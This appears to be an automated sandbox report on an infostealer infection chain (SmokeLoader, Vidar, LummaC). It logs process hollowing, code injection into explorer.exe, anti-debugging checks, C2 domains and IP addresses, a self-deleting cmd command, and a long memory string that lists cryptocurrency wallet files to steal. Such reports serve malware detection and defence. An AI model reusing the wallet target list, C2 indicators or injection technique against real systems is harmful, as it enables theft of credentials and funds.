Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: explorer.exe, 00000001.00000000.1695468211.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1695468211.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: kat796E.tmp, 00000009.00000002.2829304826.0000000005170000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareyst^
Source: explorer.exe, 00000001.00000000.1695468211.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: kat796E.tmp, 00000009.00000002.2826699308.000000000080E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHA
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000052A000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000884000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000894000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&
Source: kat796E.tmp, 00000009.00000002.2829304826.0000000005170000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: explorer.exe, 00000001.00000000.1695468211.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1692944152.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1694837986.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\4.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\4.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\4.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	System information queried: CodeIntegrityInformation			Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\4.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_00503F97 rdtsc

6_2_00503F97

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\4.exe

Code function: 0_2_00402A9F LdrLoadDll,

0_2_00402A9F

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6D07AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

9_2_6D07AC62

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02DD0D90 mov eax, dword ptr fs:[00000030h]	0_2_02DD0D90
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02DD092B mov eax, dword ptr fs:[00000030h]	0_2_02DD092B
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF19AA push dword ptr fs:[00000030h]	0_2_02EF19AA
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_02E10D90 mov eax, dword ptr fs:[00000030h]	5_2_02E10D90
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_02E1092B mov eax, dword ptr fs:[00000030h]	5_2_02E1092B
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_030113E2 push dword ptr fs:[00000030h]	5_2_030113E2
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004FED1B push dword ptr fs:[00000030h]	6_2_004FED1B
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F092B mov eax, dword ptr fs:[00000030h]	6_2_020F092B
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F0D90 mov eax, dword ptr fs:[00000030h]	6_2_020F0D90

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6D07AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

9_2_6D07AC62

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 9EDA.exe.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.28.110.209 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.18.245.58 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80	Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe

Code function: 8_2_0429A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,

8_2_0429A4F0

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\4.exe	Thread created: C:\Windows\explorer.exe EIP: 87C19E0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Thread created: unknown EIP: 34119E0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe

Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: F441.exe	String found in binary or memory: zippyfinickysofwps.shop
Source: F441.exe	String found in binary or memory: obsceneclassyjuwks.shop
Source: F441.exe	String found in binary or memory: acceptabledcooeprs.shop
Source: F441.exe	String found in binary or memory: whispedwoodmoodsksl.shop
Source: F441.exe	String found in binary or memory: boredimperissvieos.shop
Source: F441.exe	String found in binary or memory: holicisticscrarws.shop
Source: F441.exe	String found in binary or memory: sweetsquarediaslw.shop
Source: F441.exe	String found in binary or memory: plaintediousidowsko.shop
Source: F441.exe	String found in binary or memory: miniaturefinerninewjs.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\4.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\kat796E.tmp base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 42E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 641000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Process created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6D0C4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

9_2_6D0C4760

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6CFA1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

9_2_6CFA1C30

Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1692760853.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6D07AE71 cpuid

9_2_6D07AE71

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6D07A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

9_2_6D07A8DC

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6CFC8390 NSS_GetVersion,

9_2_6CFC8390

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: F441.exe, 00000006.00000003.2416404602.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.0000000000543000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2374105499.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\F441.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected CryptOne packer

Source: Yara match

File source: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 